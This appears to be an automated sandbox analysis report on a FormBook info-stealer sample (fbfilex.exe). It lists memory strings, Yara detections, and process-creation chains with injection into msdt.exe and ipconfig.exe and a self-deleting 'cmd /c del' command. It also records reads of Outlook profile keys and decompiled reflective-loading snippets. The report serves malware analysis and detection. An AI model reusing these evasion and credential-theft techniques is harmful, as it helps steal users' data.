Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: fbfilex.exe, 00000001.00000002.196725370.0000000002E61000.00000004.00000001.sdmp, update4hg4upu.exe, 00000018.00000002.427976687.00000000027B1000.00000004.00000001.sdmp; String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File source: 0000001C.00000002.442201319.0000000003070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.234170284.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000002.440439853.0000000001100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.234761977.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000018.00000002.430047358.0000000003805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.199494924.0000000003EB9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.234705355.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000002.440517576.0000000001130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000002.439593285.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 27.2.update4hg4upu.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 27.2.update4hg4upu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.fbfilex.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.fbfilex.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\msdt.exeDropped file: C:\Users\user\AppData\Roaming\56NMRA12\56Nlogri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\msdt.exeDropped file: C:\Users\user\AppData\Roaming\56NMRA12\56Nlogrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
Source: 0000001C.00000002.442201319.0000000003070000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.442201319.0000000003070000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.234170284.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.234170284.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.440439853.0000000001100000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.440439853.0000000001100000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.234761977.00000000010F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.234761977.00000000010F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.430047358.0000000003805000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.430047358.0000000003805000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.199494924.0000000003EB9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.199494924.0000000003EB9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.234705355.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.234705355.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.440517576.0000000001130000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.440517576.0000000001130000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.439593285.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.439593285.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 27.2.update4hg4upu.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 27.2.update4hg4upu.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 27.2.update4hg4upu.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 27.2.update4hg4upu.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 3.2.fbfilex.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.fbfilex.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 3.2.fbfilex.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.fbfilex.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\fbfilex.exe | Code function: 3_2_00419CA0 NtCreateFile
Source: C:\Users\user\Desktop\fbfilex.exe | Code function: 3_2_00419D50 NtReadFile
Source: C:\Users\user\Desktop\fbfilex.exe | Code function: 3_2_00419DD0 NtClose
Source: C:\Users\user\Desktop\fbfilex.exe | Code function: 3_2_00419E80 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\fbfilex.exe | Code function: 3_2_00419D4A NtReadFile
Source: C:\Users\user\Desktop\fbfilex.exe | Code function: 3_2_00419DCB NtClose
Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe | Code function: 27_2_00419CA0 NtCreateFile
Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe | Code function: 27_2_00419D50 NtReadFile
Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe | Code function: 27_2_00419DD0 NtClose
Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe | Code function: 27_2_00419E80 NtAllocateVirtualMemory
Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe | Code function: 27_2_00419D4A NtReadFile
Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe | Code function: 27_2_00419DCB NtClose
Source: fbfilex.exe, 00000001.00000000.182646899.0000000000A60000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameSw2.exe: vs fbfilex.exe
Source: fbfilex.exe, 00000001.00000002.196725370.0000000002E61000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameWinRar.dll. vs fbfilex.exe
Source: fbfilex.exe, 00000002.00000002.191530210.0000000000450000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameSw2.exe: vs fbfilex.exe
Source: fbfilex.exe, 00000003.00000002.235411271.00000000030E0000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamemsdt.exej% vs fbfilex.exe
Source: fbfilex.exe, 00000003.00000002.235242840.00000000016FF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs fbfilex.exe
Source: fbfilex.exe, 00000003.00000002.234532557.0000000000A40000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameSw2.exe: vs fbfilex.exe
Source: fbfilex.exe | Binary or memory string: OriginalFilenameSw2.exe: vs fbfilex.exe
Source: 0000001C.00000002.442201319.0000000003070000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000002.442201319.0000000003070000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.234170284.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.234170284.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.440439853.0000000001100000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.440439853.0000000001100000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.234761977.00000000010F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.234761977.00000000010F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.430047358.0000000003805000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.430047358.0000000003805000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.199494924.0000000003EB9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.199494924.0000000003EB9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.234705355.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.234705355.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.440517576.0000000001130000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.440517576.0000000001130000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.439593285.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.439593285.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 27.2.update4hg4upu.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 27.2.update4hg4upu.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 27.2.update4hg4upu.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 27.2.update4hg4upu.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.fbfilex.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.fbfilex.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.fbfilex.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.fbfilex.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: fbfilex.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: update4hg4upu.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/8@16/2
          Source: C:\Windows\explorer.exeFile created: C:\Program Files (x86)\Kx2adJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fbfilex.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_01
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\Kx2adJump to behavior
          Source: fbfilex.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\fbfilex.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\56NMRA12\56Nlogri.iniJump to behavior
          Source: C:\Users\user\Desktop\fbfilex.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: fbfilex.exeVirustotal: Detection: 38%
          Source: fbfilex.exeReversingLabs: Detection: 41%
          Source: C:\Users\user\Desktop\fbfilex.exeFile read: C:\Users\user\Desktop\fbfilex.exe:Zone.IdentifierJump to behavior
          Source: unknown, Process created: C:\Users\user\Desktop\fbfilex.exe 'C:\Users\user\Desktop\fbfilex.exe'
          Source: unknown, Process created: C:\Users\user\Desktop\fbfilex.exe {path}
          Source: unknown, Process created: C:\Users\user\Desktop\fbfilex.exe {path}
          Source: unknown, Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: unknown, Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: unknown, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\fbfilex.exe'
          Source: unknown, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown, Process created: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe C:\Program Files (x86)\Kx2ad\update4hg4upu.exe
          Source: unknown, Process created: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe {path}
          Source: unknown, Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\user\Desktop\fbfilex.exe, Process created: C:\Users\user\Desktop\fbfilex.exe {path}
          Source: C:\Users\user\Desktop\fbfilex.exe, Process created: C:\Users\user\Desktop\fbfilex.exe {path}
          Source: C:\Windows\explorer.exe, Process created: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe C:\Program Files (x86)\Kx2ad\update4hg4upu.exe
          Source: C:\Windows\SysWOW64\msdt.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\fbfilex.exe'
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe, Process created: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe {path}
          Source: C:\Windows\explorer.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3ad05575-8857-4850-9277-11b85bdb8e09}\InProcServer32
          Source: C:\Windows\SysWOW64\msdt.exe, File written: C:\Users\user\AppData\Roaming\56NMRA12\56Nlogri.ini
          Source: C:\Users\user\Desktop\fbfilex.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\msdt.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: fbfilex.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: fbfilex.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: update4hg4upu.exe, 0000001B.00000002.443206735.00000000019B0000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: update4hg4upu.exe, 0000001B.00000002.443206735.00000000019B0000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: fbfilex.exe, 00000003.00000002.235411271.00000000030E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: fbfilex.exe, 00000003.00000002.234874086.0000000001450000.00000040.00000001.sdmp, update4hg4upu.exe, 0000001B.00000002.441078060.00000000016CF000.00000040.00000001.sdmp, ipconfig.exe, 0000001C.00000002.443365605.000000000384F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: fbfilex.exe, 00000003.00000002.234874086.0000000001450000.00000040.00000001.sdmp, update4hg4upu.exe, 0000001B.00000002.441078060.00000000016CF000.00000040.00000001.sdmp, ipconfig.exe, 0000001C.00000002.443365605.000000000384F000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: fbfilex.exe, 00000003.00000002.235411271.00000000030E0000.00000040.00000001.sdmp

          Data Obfuscation:

          .NET source code contains method to dynamically call methods (often used by packers)
          Source: fbfilex.exe, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: 1.2.fbfilex.exe.970000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: 1.0.fbfilex.exe.970000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: 2.2.fbfilex.exe.360000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: 2.0.fbfilex.exe.360000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: 3.0.fbfilex.exe.950000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: 3.2.fbfilex.exe.950000.1.unpack, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: update4hg4upu.exe.4.dr, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: 24.0.update4hg4upu.exe.350000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: 24.2.update4hg4upu.exe.350000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: 27.2.update4hg4upu.exe.aa0000.1.unpack, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          Source: 27.0.update4hg4upu.exe.aa0000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, g?S?KbV?PlY }, null, null)
          .NET source code contains potential unpacker
          Source: fbfilex.exe, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
